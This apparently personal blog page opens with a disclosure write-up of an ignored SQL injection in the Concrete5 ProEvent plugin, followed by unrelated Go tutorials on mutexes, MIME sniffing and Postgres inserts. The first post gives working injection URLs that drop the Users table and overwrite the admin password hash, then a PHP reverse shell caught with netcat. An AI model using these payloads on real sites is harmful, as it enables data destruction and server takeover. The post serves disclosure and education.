Recent Posts


When Security Reports Go Ignored – Hacking Concrete5’s ProEvent Plugin

Posted on April 13, 2016

Overview

In this post I will walk you through discovering a vulnerability in a PHP plugin. This, combined with some interesting side effects in Concrete5 itself, will allow us to develop an exploit that opens a remote shell.

  • Concrete5.7.5.6
  • ProEvent Plugin 2.8.1
  • Ubuntu 14.04 with standard LAMP install

SQL Injection Discovery

In January of 2016 I was reviewing the ProEvent Concrete5 plugin that I had purchased and stumbled across a major vulnerability. I notified a developer on the plugin review team who had a relationship with the ProEvent plugin developer, and I included two Gists: one showing the issue, the other a patch where I fixed the problem.

Months passed and I forgot about it.

On Monday I was troubleshooting a different bug I had found in Concrete5’s core. But it got me thinking, whatever happened with that SQL injection bug in the ProEvent plugin? I went and downloaded the latest version and grep’d through it. Sure enough, the vulnerability was still there.

I figured the information had never been passed along. After reviewing the C5 security reporting page (which has since been updated), there wasn’t a clear path for reporting a plugin vulnerability, so I started a conversation on the forum. I wasn’t expecting it to lead to much drama; I was more interested in what someone should do the next time they discover a vuln in a plugin.

What I learned really concerned me. It turns out the plugin developer was notified on February 1st but never acted on the information.


There was also a response on the forums from Portland Labs stating their position on such matters.

“If it’s really bad enough, we’d absolutely pull the listing and jump through some hoops to send an email to people who might have the listing installed.”

As of today the plugin is still available on the marketplace and has been updated with my patch. I don’t know if users will be alerted, so I figured I’d take the time to walk through the vulnerability and educate everyone.

Setup

Get a Linux LAMP stack setup (Ubuntu 14.04.4 for simplicity)

Install Concrete5


Install ProEvents <=2.8.1


Backup your Database

backwardselvis@c5:~$ mysqldump -uroot -p c5_pwn > c5.orig.sql
Enter password:
backwardselvis@c5:~$

Enable logging and tail the log files

backwardselvis@c5:/etc/mysql$ sudo vi my.cnf
# Both location gets rotated by the cronjob.
# Be aware that this log type is a performance killer.
# As of 5.1 you can enable the log at runtime!
general_log_file = /var/log/mysql/mysql.log
general_log = 1
backwardselvis@c5:/etc/mysql$ tail -f /var/log/mysql/mysql.log

Explore

The root of the issue is a function called eventIs(). As this is a calendaring plugin, the function tries to deduce what day of the month an event falls on, and it does this with a SQL query.

    /**
     * Checks a particular day and returns true or false if an event exists.
     */
    public function eventIs($date, $category, $section = null, $allday = null)
    {
        $categories = explode(', ', $category);
        $category_q = '';
        $query_params = array();
        $i = 0;
 
        if (!in_array('All Categories', $categories)) {
            foreach ($categories as $cat) {
                $cat = str_replace('&', '&', $cat);
                if ($i) {
                    $category_q .= "OR ";
                } else {
                    $category_q .= "AND (";
                }
                $category_q .= "category LIKE '%$cat%' ";
                $i++;
            }
            $category_q .= ")";
        } else {
            $category_q = '';
        }
 
        if ($section != null) {
            $section = "AND section LIKE '%$section%'";
        } else {
            $section = '';
        }
        if ($allday != null) {
            $allday = "AND allday LIKE '%$allday%'";
        } else {
            $allday = '';
        }
 
        $db = Loader::db();
 
        $events = array();
 
        $q = "SELECT * FROM btProEventDates WHERE DATE_FORMAT(date,'%Y-%m-%d') = DATE_FORMAT('$date','%Y-%m-%d') $category_q $section $allday";
        $r = $db->query($q);
 
     //...snip...

You can see that the query-building portion concatenates the variables directly into the SELECT statement, which means the statement is never parameterized. Upon realizing this, I grep through the directory looking for every place this function is called.

$ grep -nr "eventIs(" ./
.//src/Models/EventList.php:505:    public function eventIs($date, $category, $section = null, $allday = null)
.//views/ajax/pro_event_list/calendar_dynamic.php:118:        if ($el->eventIs($daynum, $ctID, $section) == true) {
.//views/ajax/pro_event_list/calendar_responsive.php:156:    $ei = $el->eventIs($daynum, $ctID, $section);
.//views/ajax/pro_event_list/calendar_small.php:144:    $ei = $el->eventIs($daynum, $ctID, $section);
.//views/ajax/pro_event_list/calendar_small_array.php:160:        $ei = $el->eventIs($daynum, $ctID, $section);
$

I know that the function is defined in EventList.php so I proceed to dig into calendar_dynamic.php. Unfortunately, the values there are pulled from the database before being passed to eventIs(), so there isn’t any foothold.

Moving on…

I open up calendar_small.php and I see the following.

  $sctID = $request->get('sctID');
  $ctID = $request->get('ctID');
  $bID = $request->get('bID');

And further down.

if ($sctID != 'All Sections') {
  $section = $sctID;
}

And still further down.

  $ei = $el->eventIs($daynum, $ctID, $section);

Bingo. The values $ctID and $section are passed to eventIs() with no sanitization.

Upon installation of ProEvents all the routes get created and installed. That means that even if you don’t have the template/view for that part of the plugin activated on a page of your site, you are absolutely still vulnerable. So issuing a request to the calendar_small route will work.

Enter this into your browser or use a CLI tool.

  http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163&cID=183&sctID=%27;%20drop%20table%20Users;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true
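
If you prefer the CLI, curl can do the URL encoding for you. This is the same request as above (same host, block, and category IDs), just expressed as a command:

$ curl -G 'http://172.16.21.208/index.php/proevents/routes/calendar_small' \
    --data-urlencode "bID=163" --data-urlencode "cID=183" \
    --data-urlencode "sctID='; drop table Users; select * from pages where cID ='" \
    --data-urlencode "year=2016" --data-urlencode "month=05" --data-urlencode "dateset=true"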

Either request makes the following appear in the mysql logs.

SELECT * FROM btProEventDates WHERE DATE_FORMAT(DATE,'%Y-%m-%d') = DATE_FORMAT('2016-05-31','%Y-%m-%d') AND (category LIKE '%%' ) AND SECTION LIKE '%'; DROP TABLE Users; SELECT * FROM pages WHERE cID ='%'

And then I can run a quick select.

backwardselvis@c5:/var/log$ mysql -uroot -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 51
Server version: 5.5.47-0ubuntu0.14.04.1-log (Ubuntu)
 
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> use c5_pwn;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> select * from users;
ERROR 1146 (42S02): Table 'c5_pwn.Users' doesn't exist
mysql>

SWEET! I know I can mess with the database.

Now restore the database and let’s keep going.
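
If you are following along, restoring is just the earlier mysqldump in reverse:

backwardselvis@c5:~$ mysql -uroot -p c5_pwn < c5.orig.sql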

Diving in

After this I got to thinking: what else can I do? How about setting the admin password to an empty string?

http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163&cID=183&sctID=%27;%20update%20Users%20set%20uPassword=%27%27%20where%20uName=%27admin%27;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true
mysql> select uName, uEmail, uPassword from Users;
+-------+--------------------+-----------+
| uName | uEmail             | uPassword |
+-------+--------------------+-----------+
| admin | jfolkins@gmail.com |           |
+-------+--------------------+-----------+
1 row in set (0.00 sec)

What if I want to log in? Let’s take a bcrypt salt/hash from another installation and use it to update the admin user’s.

http://172.16.21.208/index.php/proevents/routes/calendar_small?bID=163&cID=183&sctID=%27;%20update%20Users%20set%20uPassword=%27$2a$12$zkjyqBpTXbYmjGf7QSgqyeskvNponQ86jMWE1tqv6eCb588/MqS9u%27%20where%20uName=%27admin%27;%20select%20*%20from%20pages%20where%20cID%20=%27&year=2016&month=05&dateset=true
mysql> select uName, uEmail, uPassword from Users;
+-------+--------------------+--------------------------------------------------------------+
| uName | uEmail             | uPassword                                                    |
+-------+--------------------+--------------------------------------------------------------+
| admin | jfolkins@gmail.com | $2a$12$zkjyqBpTXbYmjGf7QSgqyeskvNponQ86jMWE1tqv6eCb588/MqS9u |
+-------+--------------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

I attempt to log in with user = admin and password = concretepwn. I succeed.

Let’s go deeper

I can log in! But now what? Unfortunately, Concrete5 only allows you to download plugins from its marketplace, so unlike WordPress, where I could directly manipulate the PHP files, I don’t appear to be able to do that here. But I do find something interesting.

On the allowed file upload types screen I append the php file type to the end of the list. I then upload a standard PHP reverse shell script.

I request the URL in the browser, with netcat already listening on my machine.

http://172.16.21.208/application/files/1614/6059/6987/jpwn.php
➜  ~ sudo nc -l 172.16.21.1 11234
Linux c5 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 18:34:50 up  4:34,  2 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
backward pts/0    172.16.21.1      14:01    1:50m  0.82s  0.02s sshd: backwardselvis [priv]
backward pts/3    172.16.21.1      16:51    2:10   0.16s  0.16s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

SHELL!

Events

  • Notification sent to plugin developer on February 1st 2016
  • Developer ignores the report
  • Forum post initiated on April 11th, 2016
  • Developer silently applied the supplied patch, verbatim, on April 13th 2016
  • No communication to the plugin’s user base has been sent
  • CVE was denied because the vendor isn’t supported
  • Concrete5’s marketplace only reviews the initial plugin submission; subsequent updates are not reviewed. Buyer beware.

Conclusion

This shows what you can do when you find one vulnerability. Chaining it with other weak points (the same password hashing scheme across installs, executable file uploads) allowed me to own a standard Ubuntu LAMP install.

It is also a reminder to me that you can’t depend on people to update their code. Best to cast some light on things and get everything out in the open.

 

Understanding When To Use Channels Or Mutexes In Go

Problem Domain

Community: “Share Memory By Communicating”
Interpretation: “CHANNEL ALL TEH THINGZ!”

Because many developers come from backgrounds (PHP, Ruby, Perl, Python) where, unlike Go, concurrency is not a first-class citizen, they struggle when learning about it. But they apply themselves and take the time to dig into Go’s concurrency model. And just as they finally feel they’ve come to grips with it, something painful happens: the developer decides to use their newfound super-power (goroutines + channels) for absolutely everything, and it suddenly becomes an anti-pattern.

External Confirmation

I’m not the only one who has noticed. In the discussion below Andrew warns about the overuse of channels to keep state in goroutines.

“Hey, concurrency is great, but all this needs is a mutex”

Also, in the following interview between Andrew and Dave, Andrew asks Dave for an example of bad code he has written, and Dave specifically mentions using too many channels.

“…and I tried to use channels for everything, if you want to talk about worst code…”

Confession

When I created BadActor, I needed it to help me identify malicious activity against my systems so that I could respond to it. I set out to solve my problem (and gain proficiency with Go), and I envisioned a grand design where everything was a goroutine, communication would happen only through channels, and I would never need another mutex ever again. (Hah!)

It sounded great in theory. But the composition was cumbersome, and holy crap did the benchmarks suck. I didn’t think too much of this; I assumed I was just misunderstanding how to use channels in Go. So I hunkered down and persisted with my design for a while until I learned better. When I realized my error, I rewrote large portions of the codebase.

Coding Horror

Below is an old commit of BadActor’s where I had originally architected the exact model that Andrew and Dave spoke about: many goroutines, each with their own channel(s), combined with message types to define the behavior of the communication. I leave it here so you can hopefully learn from my mistake.

Here is the Actor’s goroutine with its open channel.

func (a *Actor) Run() {
	go func() {
		for {
			select {
			case in := <-a.Incoming:
				a.switchBoard(in)
			default:
				a.overwatch()
			}
		}
	}()
}

And here is the awkward type checking that Andrew warns about.

func (a *Actor) switchBoard(in *Incoming) {
	switch in.Type {
	case KEEP_ALIVE:
		err := a.rebaseAll()
		in.Outgoing <- &Outgoing{Error: err}
	case INFRACTION:
		err := a.infraction(in.RuleName)
		in.Outgoing <- &Outgoing{Error: err}
	case CREATE_INFRACTION:
		err := a.createInfraction(in.Infraction)
		in.Outgoing <- &Outgoing{Error: err}
	case STRIKES:
		total := a.strikes(in.RuleName)
		in.Outgoing <- &Outgoing{Message: strconv.Itoa(total)}
	case IS_JAILED:
		res := a.isJailed()
		in.Outgoing <- &Outgoing{Message: strconv.FormatBool(res), Error: nil}
	case IS_JAILED_FOR:
		res := a.isJailedFor(in.RuleName)
		in.Outgoing <- &Outgoing{Message: strconv.FormatBool(res), Error: nil}
	}
}

Practical Example – Mutex

If I synchronously need to solve for (x) and I just have one input, then I protect it with a mutex. I do not implement channels and goroutines just to protect the state of some asset.

Example: A cache takes one key (k) to gather one value (x).

Below is a very naive cache and HTTP server I created to help illustrate the idea.

We start by creating our main.go file.

$ vi main.go

Then we import the needed packages (thanks, goimports).

package main
 
import (
  "fmt"
  "html"
  "log" 
  "net/http"
  "net/url"
  "sync"
)

Next we define our NaiveCache type and give it some getter/setter methods.

//
// NaiveCache
//
 
var c *NaiveCache
 
type NaiveCache struct {
  mu      sync.Mutex
  storage map[string]string
}
 
func (c *NaiveCache) Value(k string) (string, error) {
  var v string
  c.mu.Lock()
  defer c.mu.Unlock()
  if v, ok := c.storage[k]; ok {
    return v, nil
  }
  return v, fmt.Errorf("Value Not Found")
}
 
func (c *NaiveCache) SetValue(k string, v string) {
  c.mu.Lock()
  c.storage[k] = v
  c.mu.Unlock()
  return
}

Here we implement the server giving it a handler and two helper functions, get() and post().

//
// Server
//
func NaiveCacheHandler(w http.ResponseWriter, r *http.Request) {
  switch r.Method {
  case "GET":
    get(w, r)
  case "POST":
    post(w, r)
  }
}
 
func get(w http.ResponseWriter, r *http.Request) {
  id, err := url.QueryUnescape(r.URL.Query().Get("key"))
  if err != nil {
    w.WriteHeader(http.StatusBadRequest)
    b := []byte(fmt.Sprintf("%v StatusBadRequest", http.StatusBadRequest))
    w.Write(b)
    return
  }
 
  v, err := c.Value(id)
  if err != nil {
    w.WriteHeader(http.StatusNotFound)
    b := []byte(fmt.Sprintf("%v StatusNotFound", http.StatusNotFound))
    w.Write(b)
    return
  }
 
  w.Write([]byte(html.EscapeString(v)))
  return
}
 
func post(w http.ResponseWriter, r *http.Request) {
  k := html.EscapeString(r.FormValue("key"))
  v := html.EscapeString(r.FormValue("value"))
  if len(k) == 0 || len(v) == 0 {
    w.WriteHeader(http.StatusBadRequest)
    b := []byte(fmt.Sprintf("%v StatusBadRequest", http.StatusBadRequest))
    w.Write(b)
    return
  }
 
  c.SetValue(k, v)
  w.WriteHeader(http.StatusOK)
  b := []byte(fmt.Sprintf("%v StatusOK", http.StatusOK))
  w.Write(b)
  return
}

We end with the main function, which is called when our compiled application runs.

//
// Main
//
func main() {
  // init the cache
  c = &NaiveCache{storage: make(map[string]string)}
 
  // start the server
  http.HandleFunc("/cache", NaiveCacheHandler)
  log.Fatal(http.ListenAndServe(":9090", nil))
}

Run the application.

$ go run main.go

And submit some curl requests to see it work.

$ curl -X GET http://localhost:9090/cache\?key\=somekey
404 StatusNotFound
$ curl --data "key=somekey&value=somevalue" http://localhost:9090/cache
200 StatusOK
$ curl -X GET http://localhost:9090/cache\?key\=somekey
somevalue
$ curl -X GET http://localhost:9090/cache\?key\=somekey
somevalue
$

Closing

Don’t worry about failing; everyone learns when they fail, so go ahead, dive in, and start building something in Go. But remember: if you feel like you are fighting your design and you notice that you are primarily using channels to protect state, then hey, concurrency is great, but all you need is a mutex.
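
One refinement worth noting, purely as an aside and not part of the example above: if the cache is read far more often than it is written to, sync.RWMutex keeps exactly the same shape while letting concurrent readers through.

// Assumes the same imports as above (fmt, sync); only the mutex type changes.
type NaiveCache struct {
  mu      sync.RWMutex
  storage map[string]string
}

// Value takes a read lock, so many readers can proceed at the same time.
func (c *NaiveCache) Value(k string) (string, error) {
  c.mu.RLock()
  defer c.mu.RUnlock()
  if v, ok := c.storage[k]; ok {
    return v, nil
  }
  return "", fmt.Errorf("Value Not Found")
}

// SetValue still takes the exclusive write lock.
func (c *NaiveCache) SetValue(k string, v string) {
  c.mu.Lock()
  c.storage[k] = v
  c.mu.Unlock()
}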

How to get punched in the face by Go’s Standard Library (and arguably my own stupidity)

Posted on June 23, 2014

Ever have one of those days? An “I forgot to add a semicolon to terminate a line” type of day? Yeah, me too. And today was one of them.

Many developers, when accepting user-uploaded data, tend to trust the web browser’s headers a little too much. I prefer to use MIME type sniffing on the actual binary stream. This gives me a greater level of assurance that I’m not allowing a user to upload a different type of file than the one I want, say an executable binary with which to do my application damage.

I’ve been using the DetectContentType function from the net/http package (it lives in sniff.go) in the Go standard library to do this type of detection on images.

func ValidateImageType(b []byte) (string) {
  m := http.DetectContentType(b)
  switch m { 
  case "image/jpeg":
    return "jpg"
  case "image/png":
    return "png"
  case "image/gif":
    return "gif"
  }
  return ""
}

It works wonderfully.
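
For context, here is roughly how a helper like that gets wired into an upload handler. The handler and form field names are assumptions for this sketch; only ValidateImageType comes from the snippet above, and the extra imports needed are io and net/http. Since DetectContentType considers at most the first 512 bytes, that is all we read.

// Hypothetical upload handler showing where ValidateImageType fits.
func uploadHandler(w http.ResponseWriter, r *http.Request) {
  f, _, err := r.FormFile("image") // the form field name is an assumption
  if err != nil {
    http.Error(w, "bad upload", http.StatusBadRequest)
    return
  }
  defer f.Close()

  // DetectContentType looks at no more than 512 bytes, so sniff just those.
  head := make([]byte, 512)
  n, _ := io.ReadFull(f, head)

  if ext := ValidateImageType(head[:n]); ext == "" {
    http.Error(w, "unsupported image type", http.StatusUnsupportedMediaType)
    return
  }
  // ...store the file, remembering the first bytes have already been read...
}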

Today I figured I’d implement mp4 detection so I could detect videos. I snagged a video file off my Note 2 and created a quick test.

func ValidateVideoType(b []byte) (string) {
  m := http.DetectContentType(b)
  switch m { 
  case "video/mp4":
    return "mp4"
  }
  return ""
}

This didn’t work, so I headed over to the documentation. After reading the function’s signature, I was pretty sure I was using it correctly. Suspecting that my mp4 was corrupt, I opened the file up in a hex editor.


Comparing it to the living specification, it appeared correct. But just in case the file was in fact corrupt, I went out and found a test mp4 file from Apple.com. Unfortunately this file also failed.

Knowing that I was using the function correctly, and that the file was intact, I headed over to review the sniff.go source file and reimplemented its mp4 matching logic in a quick standalone test so I could compare it against DetectContentType.

package main
 
import (
  "encoding/binary"
  "bytes"
  "log"
  "os"
  "io"
  "net/http"
)
 
func main() {
  var total int
  var ext string
  buf := make([]byte, 512)
 
  fi, err := os.Open("./sample_mpeg4.mp4")
  if err != nil {
    panic(err)
  }
  defer fi.Close()
 
  for {
    n, err := fi.Read(buf)
    total = total + n
    if n == 0 {
      break
    }
    if err == io.EOF {
      break
    }
    if err != nil {
      break
    }
 
    if n == 512 {
 
      data := buf[:n]
      if len(data) < 8 {
        break
      }
 
      boxSize := int(binary.BigEndian.Uint32(data[:4]))
      if boxSize%4 != 0 {
        break
      }
      if len(data) < boxSize {
        break
      }
      if !bytes.Equal(data[4:8], []byte("ftyp")) {
        break
      }
 
      for st := 8; st < boxSize; st += 4 {
        if st == 12 {
          continue
        }
        seg := string(data[st : st+3])
        switch seg {
          case"mp4", "iso", "M4V", "M4P", "M4B":
            ext = "mp4"
        }
        if len(ext) > 1 {
          break
        }
      }
 
      m := http.DetectContentType(buf)
      log.Println("LOCAL: ", ext)
      log.Println("SOURCE: ", m)
    }
  }
}

Bizarrely, the local version found the desired file type. Wuuuuuuuu?!?

I wondered if it was my OS X environment, so I spun up a Linux box, downloaded the Go source, and dove into the source code.

Making sure I was at least starting off in the right direction, I ran the bash script go/src/all.bash and all the tests completed successfully. I went to the sniff_test.go file and found this test dataset commented out.

        //{"MP4 video", []byte("\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom&lt;\x06t\xbfmdat"), "video/mp4"},

Hmmmmm, that looked interesting. So I uncommented the code and ran the tests again. THEY FAILED! It wasn’t what I wanted, but at this point I’ll take anything.
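
(Side note: rather than re-running all of all.bash each time, the sniffing tests can be run on their own with something like the command below. The exact test name may differ between Go versions, so treat it as a starting point rather than gospel.)

$ go test -run DetectContentType net/http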

Knowing I was close I did a recursive grep for the function signature in question to see what was using it.

backwardselvis@lts-linux:~/go/src$ grep -nr "mp4Sig" ./
./pkg/net/http/sniff.go:102:	//mp4Sig(0),
./pkg/net/http/sniff.go:164:type mp4Sig int
./pkg/net/http/sniff.go:166:func (mp4Sig) match(data []byte, firstNonWS int) string {
backwardselvis@lts-linux:~/go/src$

And immediately, my face struck my palm and my head hit my keyboard.

I opened up sniff.go, the EXACT SAME FILE that I’d been staring at all day, and uncommented line 102. I saved, quit, and upon running the tests again they all passed successfully.

So there you have it: an unimplemented feature plus traversing old version-control subtrees leads to a bad day. Make sure you actually review the source you are working on.

:peace


How To: Shove data into Postgres using Goroutines(Gophers) and GoLang

After watching Rob Pike’s wonderful golang talk, ‘Concurrency Is Not Parallelism’, in which he uses the analogy of many gophers running around getting work done, I realized that I wanted to write a test to better solidify the concept.

Rob Pike – ‘Concurrency Is Not Parallelism’

Recently, a pain point for me while using Play! and Scala was finding a fast way to insert data into a Postgres database. My solution was fine, but I felt it could be simpler; nay, I would even say that ideally it SHOULD be simpler. I decided to see how golang would handle this type of problem.

First, install golang 1.2 and Postgres 9.3.1 (I am on an OS X 10.9 machine).

We will then create a database with one table.

$ initdb ~/Programming/postgres -E utf8
$ pg_ctl -D ~/Programming/postgres -l ~/logfile start
$ createdb testdb
$ psql testdb
testdb=# create table test ( gopher_id int, created timestamp );

Next, create a file called test_one.go with the code provided below. Our goal right now is simply to get data inserted into the database. I should mention that I planned to have many goroutines (or, as Rob says, gophers) inserting data into my testdb, so the gopher_id column is in preparation for that.

package main
 
import (
  //"os"
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
func main() {
  // create the statement string
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  stmt, err := db.Prepare(sStmt)
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("StartTime: %v\n", time.Now())
 
  res, err := stmt.Exec(1, time.Now())
  if err != nil || res == nil {
    log.Fatal(err)
  }
 
  // close statement
  stmt.Close()
 
  // close db
  db.Close()
 
  fmt.Printf("StopTime: %v\n", time.Now())
}

Run it and take a look at the results.

$ go build test_one.go 
$ ./test_one 
StartTime: 2013-10-28 19:37:11.014548615 -0700 PDT
StopTime: 2013-10-28 19:37:11.01744029 -0700 PDT
$

Yay! We have inserted exactly one row into the database.

Let’s modify our program to insert 100,000 rows using a simple for loop.

package main
 
import (
  "os"
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
func main() {
  // create the statement string
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
  var entries int = 100000
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("StartTime: %v\n", time.Now())
  for i := 0; i < entries; i++ {
 
    stmt, err := db.Prepare(sStmt)
    if err != nil {
      log.Fatal(err)
    }
 
    res, err := stmt.Exec(1, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
    // close statement
    stmt.Close()
  }
 
  // close db
  db.Close()
 
  fmt.Printf("StopTime: %v\n", time.Now())
  os.Exit(0)
}

And the results after running it.

$ ./test_one 
StartTime: 2013-10-28 19:53:55.397246856 -0700 PDT
StopTime: 2013-10-28 19:54:30.471278797 -0700 PDT
$

Ok. It took 35 seconds to insert a simple timestamp 100,000 times.

Now here is where we want to mix things up a bit. Rob mentions this thing called a goroutine in his talk. What would happen if we used 10 goroutines to insert 10,000 records each? It should be faster, right?

Here is my test_many.go application, copy it.

package main
 
// schema we can use along with some select statements
// create table test ( gopher_id int, created timestamp );
// select * from test order by created asc limit 1;
// select * from test order by created desc limit 1;
// select count(created) from test;
 
import (
  "log"
  "time"
  "fmt"
  "database/sql"
  _ "github.com/lib/pq"
)
 
const (
  gophers = 10
  entries = 10000
)
 
func main() {
 
  // create string to pass
  var sStmt string = "insert into test (gopher_id, created) values ($1, $2)"
 
  // run the insert function using 10 go routines
  for i := 0; i < gophers; i++ {
    // spin up a gopher
    go gopher(i, sStmt)
  }
 
  // this is a simple way to keep a program open
  // the go program will close when a key is pressed
  var input string
  fmt.Scanln(&input)
}
 
func gopher(gopher_id int, sStmt string) {
 
  // lazily open db (doesn't truly open until first request)
  db, err := sql.Open("postgres","host=localhost dbname=testdb sslmode=disable")
  if err != nil {
    log.Fatal(err)
  }
 
  fmt.Printf("Gopher Id: %v || StartTime: %v\n",gopher_id, time.Now())
 
  for i := 0; i < entries; i++ {
 
    stmt, err := db.Prepare(sStmt)
    if err != nil {
      log.Fatal(err)
    }
 
    res, err := stmt.Exec(gopher_id, time.Now())
    if err != nil || res == nil {
      log.Fatal(err)
    }
 
    stmt.Close()
 
  }
  // close db
  db.Close()
 
  fmt.Printf("Gopher Id: %v || StopTime: %v\n",gopher_id, time.Now())
 
}

Compile and run it. And here are the results.

$ go build test_many.go
$ ./test_many 
Gopher Id: 0 || StartTime: 2013-10-28 20:33:22.756366002 -0700 PDT
Gopher Id: 1 || StartTime: 2013-10-28 20:33:22.756647643 -0700 PDT
Gopher Id: 2 || StartTime: 2013-10-28 20:33:22.756794146 -0700 PDT
Gopher Id: 3 || StartTime: 2013-10-28 20:33:22.756918631 -0700 PDT
Gopher Id: 4 || StartTime: 2013-10-28 20:33:22.757068214 -0700 PDT
Gopher Id: 5 || StartTime: 2013-10-28 20:33:22.757215735 -0700 PDT
Gopher Id: 6 || StartTime: 2013-10-28 20:33:22.757371258 -0700 PDT
Gopher Id: 7 || StartTime: 2013-10-28 20:33:22.757492378 -0700 PDT
Gopher Id: 8 || StartTime: 2013-10-28 20:33:22.757640434 -0700 PDT
Gopher Id: 9 || StartTime: 2013-10-28 20:33:22.758553529 -0700 PDT
Gopher Id: 5 || StopTime: 2013-10-28 20:33:31.466897188 -0700 PDT
Gopher Id: 7 || StopTime: 2013-10-28 20:33:31.473265074 -0700 PDT
Gopher Id: 0 || StopTime: 2013-10-28 20:33:31.475096903 -0700 PDT
Gopher Id: 4 || StopTime: 2013-10-28 20:33:31.485587389 -0700 PDT
Gopher Id: 6 || StopTime: 2013-10-28 20:33:31.500614304 -0700 PDT
Gopher Id: 3 || StopTime: 2013-10-28 20:33:31.5006651 -0700 PDT
Gopher Id: 8 || StopTime: 2013-10-28 20:33:31.501664917 -0700 PDT
Gopher Id: 1 || StopTime: 2013-10-28 20:33:31.510199788 -0700 PDT
Gopher Id: 2 || StopTime: 2013-10-28 20:33:31.522350833 -0700 PDT
Gopher Id: 9 || StopTime: 2013-10-28 20:33:31.523710669 -0700 PDT
 
$

Nice! Roughly 9 seconds for 100,000 records.

Lets change our test_many.go application to insert 1,000,000 records. Simply as a way to keep the application running longer.

...snip...
 
const (
  gophers = 10
  entries = 100000
)
 
...snip...

Now go ahead and build the application and run it.

Then in another terminal window, open up top and search for the test_many command.

PID    COMMAND      %CPU TIME     #TH   #WQ  #PORT #MREGS MEM    RPRVT  PURG   CMPRS  VPRVT  VSIZE  PGRP  PPID  STATE    UID       FAULTS    COW     MSGSENT    MSGRECV
89478  test_many    0.0  00:12.39 15    0    84    1448   140M   139M   0B     0B     358M   139G   89478 88263 sleeping 672251097 36630     95      110        51

You will see under the #TH column that our application, test_many, has 15 threads open. 10 of these are the threads we created using our goroutines.

UPDATE: That statement was not true. After working with Go, I’ve learned that when using goroutines, threads are assigned dynamically; it is not a 1-to-1 correlation.
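
If you want to see this from inside the program rather than from top, the runtime package reports what Go itself is tracking. This is a standalone snippet I put together for illustration, not part of test_many.go:

package main

import (
  "fmt"
  "runtime"
  "time"
)

func main() {
  // Spin up 10 parked goroutines, the same count as our gophers.
  for i := 0; i < 10; i++ {
    go func() { time.Sleep(time.Second) }()
  }

  // Goroutines are multiplexed onto a smaller pool of OS threads,
  // which is why this count will not match the #TH column in top.
  fmt.Println("goroutines:", runtime.NumGoroutine())
  fmt.Println("GOMAXPROCS:", runtime.GOMAXPROCS(0))
}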

However, Rob does have a talk where he mentions some more details. At minute 8:56 he says

“But if you think of it as a very cheap thread, you won’t be far off”

 

Anyway, this is the section of the test_many.go file where the magic happens.

...snip...
 
  for i := 0; i < gophers; i++ {
    // spin up a gopher
    go gopher(i, sStmt)
  }
 
...snip...

You see, simply by placing the “go” keyword in front of our gopher function call, we allow golang to do a bunch of behind-the-scenes awesomeness. Part of this gain is an inexpensive and versatile thread and memory manager. This is pretty sweet.

As the last test, here are 20 gophers inserting a million rows into our database.

Change the needed constants.

...snip...
 
const (
  gophers = 20
  entries = 50000
)
 
...snip...

Then recompile and run our application.

$ ./test_many 
Gopher Id: 0 || StartTime: 2013-10-30 14:40:51.619452739 -0700 PDT
Gopher Id: 1 || StartTime: 2013-10-30 14:40:51.619757831 -0700 PDT
Gopher Id: 2 || StartTime: 2013-10-30 14:40:51.619896348 -0700 PDT
Gopher Id: 3 || StartTime: 2013-10-30 14:40:51.620059076 -0700 PDT
Gopher Id: 4 || StartTime: 2013-10-30 14:40:51.620283647 -0700 PDT
Gopher Id: 5 || StartTime: 2013-10-30 14:40:51.620410941 -0700 PDT
Gopher Id: 6 || StartTime: 2013-10-30 14:40:51.620550967 -0700 PDT
Gopher Id: 7 || StartTime: 2013-10-30 14:40:51.620693553 -0700 PDT
Gopher Id: 8 || StartTime: 2013-10-30 14:40:51.62085492 -0700 PDT
Gopher Id: 9 || StartTime: 2013-10-30 14:40:51.62177397 -0700 PDT
Gopher Id: 10 || StartTime: 2013-10-30 14:40:51.621900208 -0700 PDT
Gopher Id: 11 || StartTime: 2013-10-30 14:40:51.622068806 -0700 PDT
Gopher Id: 12 || StartTime: 2013-10-30 14:40:51.622233856 -0700 PDT
Gopher Id: 13 || StartTime: 2013-10-30 14:40:51.622374732 -0700 PDT
Gopher Id: 14 || StartTime: 2013-10-30 14:40:51.622520823 -0700 PDT
Gopher Id: 15 || StartTime: 2013-10-30 14:40:51.622663899 -0700 PDT
Gopher Id: 16 || StartTime: 2013-10-30 14:40:51.6228063 -0700 PDT
Gopher Id: 17 || StartTime: 2013-10-30 14:40:51.62294893 -0700 PDT
Gopher Id: 18 || StartTime: 2013-10-30 14:40:51.623085432 -0700 PDT
Gopher Id: 19 || StartTime: 2013-10-30 14:40:51.623231574 -0700 PDT
Gopher Id: 3 || StopTime: 2013-10-30 14:42:35.551828109 -0700 PDT
Gopher Id: 6 || StopTime: 2013-10-30 14:42:35.619763694 -0700 PDT
